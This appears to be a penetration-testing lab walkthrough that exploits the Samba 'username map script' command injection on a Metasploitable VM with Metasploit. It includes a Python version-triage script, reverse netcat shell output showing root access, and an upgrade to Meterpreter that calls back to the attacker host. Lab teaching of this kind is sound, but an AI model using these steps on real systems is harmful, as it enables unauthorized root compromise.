Download link: https://pan.baidu.com/s/172oPtDMQPVFfrfiCasPPJQ
Extraction code: anm4
After extracting the archive, open the VM in VMware (the target is the Metasploitable VM).
- Attacker: Kali Linux, IP address 192.168.118.1
- Target IP address: 192.168.118.2
- Lock onto the target
msf6 > db_nmap -sV -A 192.168.118.2
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 10:27 CST
msf6 > services
Services
========

host           port  proto  name         state  info
----           ----  -----  ----         -----  ----
192.168.118.2  139   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.118.2  445   tcp    netbios-ssn  open   Samba smbd 3.0.20-Debian workgroup: WORKGROUP
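The decision in the next step (which module to use) comes straight from the version string in the `services` table. The script below is an added example, not part of the original walkthrough: it parses `services`-style rows, extracts the Samba version from the banner and flags hosts whose version falls inside the range hit by exploit/multi/samba/usermap_script (Samba 3.0.20 through 3.0.25rc3, the "username map script" command injection, CVE-2007-2447). The first two rows of the sample input are the target from this page; the remaining hosts are constructed to exercise the release-candidate and suffix comparisons.

```python
import re

# Constructed sample input: `services` rows in the format msfconsole prints
# after db_nmap. The first two rows are the target from this walkthrough; the
# rest are made-up hosts added to exercise the version comparison.
SERVICES = """\
192.168.118.2 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.118.2 445 tcp netbios-ssn open Samba smbd 3.0.20-Debian workgroup: WORKGROUP
10.0.0.5 445 tcp netbios-ssn open Samba smbd 3.0.25rc3 workgroup: WORKGROUP
10.0.0.6 445 tcp netbios-ssn open Samba smbd 3.0.26a workgroup: WORKGROUP
10.0.0.7 445 tcp netbios-ssn open Samba smbd 4.13.5-Debian workgroup: WORKGROUP
"""

FINAL = 999  # sorts a final release after any rcN of the same number

# usermap_script abuses the "username map script" command injection
# (CVE-2007-2447), present in Samba 3.0.20 through 3.0.25rc3 inclusive.
VULN_MIN = (3, 0, 20, FINAL, "")
VULN_MAX = (3, 0, 25, 3, "")

_VER = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)(?:rc(\d+))?([a-z]?)")


def parse_samba_version(info):
    """Return (major, minor, patch, rc, letter) or None when the banner carries
    no exact version (e.g. the vague '3.X - 4.X' string nmap prints on 139/tcp)."""
    m = _VER.search(info)
    if not m:
        return None
    major, minor, patch, rc, letter = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else FINAL, letter)


def is_usermap_script_candidate(version):
    """True when the reported version falls inside the affected range."""
    return VULN_MIN <= version <= VULN_MAX


def triage(services_text):
    """Parse `services` output and flag hosts whose Samba banner matches.

    Returns a list of (host, port, banner, candidate) tuples."""
    results = []
    for line in services_text.splitlines():
        host, port, _proto, _name, _state, *rest = line.split()
        info = " ".join(rest)
        ver = parse_samba_version(info)
        hit = ver is not None and is_usermap_script_candidate(ver)
        results.append((host, int(port), info, hit))
    return results


if __name__ == "__main__":
    for host, port, info, hit in triage(SERVICES):
        tag = "CANDIDATE" if hit else "skip"
        print(f"{tag:9} {host}:{port}  {info}")
```

A banner match is a candidate, not proof: distributions sometimes backport fixes without bumping the version string, so confirm by running the module against the lab target, as the rest of this page does. The 139/tcp row is deliberately left unflagged because "3.X - 4.X" is too vague to compare.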
- Select the exploit module. The 445/tcp banner reports Samba 3.0.20-Debian, which falls in the range attacked by exploit/multi/samba/usermap_script: Samba's `username map script` option passed the supplied username to a shell unescaped, so a username containing shell metacharacters runs arbitrary commands as the Samba daemon (CVE-2007-2447).
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > info
- Configure the options
The `show missing` command lists the options that still need a value before the module can run. Here only RHOSTS is missing; the payload section is empty because LHOST and LPORT were already filled in with defaults (the handler later binds 192.168.118.1:4444). Set the target host.
msf6 exploit(multi/samba/usermap_script) > show missing

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


Payload options (cmd/unix/reverse_netcat):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.118.2
rhosts => 192.168.118.2
- Launch the exploit
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.118.1:4444
[*] Command shell session 2 opened (192.168.118.1:4444 -> 192.168.118.2:53121) at 2021-02-27 11:01:51 +0800
hostname
metasploitable
id
uid=0(root) gid=0(root)
After the exploit succeeds we hold a session on the target machine.
Running a few commands confirms what we obtained: `hostname` identifies the box and `id` returns uid=0, so the shell runs as root.
- Press Ctrl+Z to send the session to the background.
^Z
Background session 2? [y/N] y
msf6 exploit(multi/samba/usermap_script) >
- Use the `sessions` command to list sessions and bring one back to the foreground.
msf6 exploit(multi/samba/usermap_script) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  2         shell cmd/unix               192.168.118.1:4444 -> 192.168.118.2:53121 (192.168.118.2)
msf6 exploit(multi/samba/usermap_script) > sessions -i 2
[*] Starting interaction with 2...
id
uid=0(root) gid=0(root)
- MSF picked the payload for us by default (cmd/unix/reverse_netcat, as reported when the module was loaded).
- `show payloads` lists every payload compatible with the current module.
- A plain command shell session can be upgraded to a Meterpreter session with `sessions -u`, which unlocks the more advanced post-exploitation features. MSF does this by running post/multi/manage/shell_to_meterpreter, which starts a second handler and uses the existing shell to stage the Meterpreter payload.
msf6 exploit(multi/samba/usermap_script) > sessions -l

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  3         shell cmd/unix               192.168.118.1:4444 -> 192.168.118.2:38867 (192.168.118.2)
msf6 exploit(multi/samba/usermap_script) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.118.1:4433
[*] Sending stage (976712 bytes) to 192.168.118.2
[*] Meterpreter session 4 opened (192.168.118.1:4433 -> 192.168.118.2:59915) at 2021-02-27 11:26:09 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(multi/samba/usermap_script) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                                                        Connection
  --  ----  ----                   -----------                                                                        ----------
  3         shell cmd/unix                                                                                            192.168.118.1:4444 -> 192.168.118.2:38867 (192.168.118.2)
  4         meterpreter x86/linux  root @ metasploitable (uid=0, gid=0, euid=0, egid=0) @ metasploitable.localdo...  192.168.118.1:4433 -> 192.168.118.2:59915 (192.168.118.2)
msf6 exploit(multi/samba/usermap_script) > sessions -i 4
[*] Starting interaction with 4...
meterpreter >
meterpreter > ipconfig
Interface 2
============
Name : eth0
Hardware MAC : 00:0c:29:be:8d:c1
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.118.2
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:febe:8dc1
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > guid
[+] Session GUID: b7435625-211f-4000-b516-0a22e35d8b4b
meterpreter > getuid
Server username: root @ metasploitable (uid=0, gid=0, euid=0, egid=0)